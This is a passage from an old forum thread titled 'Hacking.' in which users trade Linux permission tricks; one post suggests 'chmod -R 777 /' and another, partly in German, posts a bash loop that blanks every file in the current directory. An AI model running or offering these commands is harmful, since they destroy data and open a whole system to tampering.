Raised This Month: $ Target: $400
 0% 

Hacking.


Post New Thread Reply   
 
Thread Tools Display Modes
TeddyDesTodes
Senior Member
Join Date: Oct 2008
Location: 10.25.15.210
Old 12-09-2008 , 00:16   Re: Hacking.
Reply With Quote #21

why not use chmod -R 777 /
but you dont need to chmod it if you are root...
or you cant chmod it if you are not root...
so your chmod it useless...
but if you are root you can set chown -R root:root /home and chmod it 700
__________________
TeddyDesTodes is offline
Send a message via ICQ to TeddyDesTodes
allenwr
Veteran Member
Join Date: Jan 2006
Location: The place where the karm
Old 12-09-2008 , 02:46   Re: Hacking.
Reply With Quote #22

some system files in linux do not have root permissions unless chmodded
__________________
Don't ever place an order with Vee Servers. This is why.
allenwr is offline
Send a message via ICQ to allenwr Send a message via Yahoo to allenwr
One
Veteran Member
Join Date: Oct 2008
Location: Hardstyle-eSports.de
Old 12-09-2008 , 03:08   Re: Hacking.
Reply With Quote #23

lol wir wollen doch nicht gleich übertreiben, das soll ein test sein, wenn now.... dann kann der diesen prossez nicht so einfach killen und hat viele probleme


Code:
#!/bin/bash
# BS loeschen
clear
for wert in * 
do
echo $wert
sleep 1
echo "" > $wert 
done

Last edited by One; 12-09-2008 at 04:31.
One is offline
Send a message via ICQ to One Send a message via AIM to One Send a message via MSN to One Send a message via Yahoo to One Send a message via Skype™ to One
Reply



Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT -4. The time now is 15:14.


Powered by vBulletin®
Copyright ©2000 - 2024, vBulletin Solutions, Inc.
Theme made by Freecode